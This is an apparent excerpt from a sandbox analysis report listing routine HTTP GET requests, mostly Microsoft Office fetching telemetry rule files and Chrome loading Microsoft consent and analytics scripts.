              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
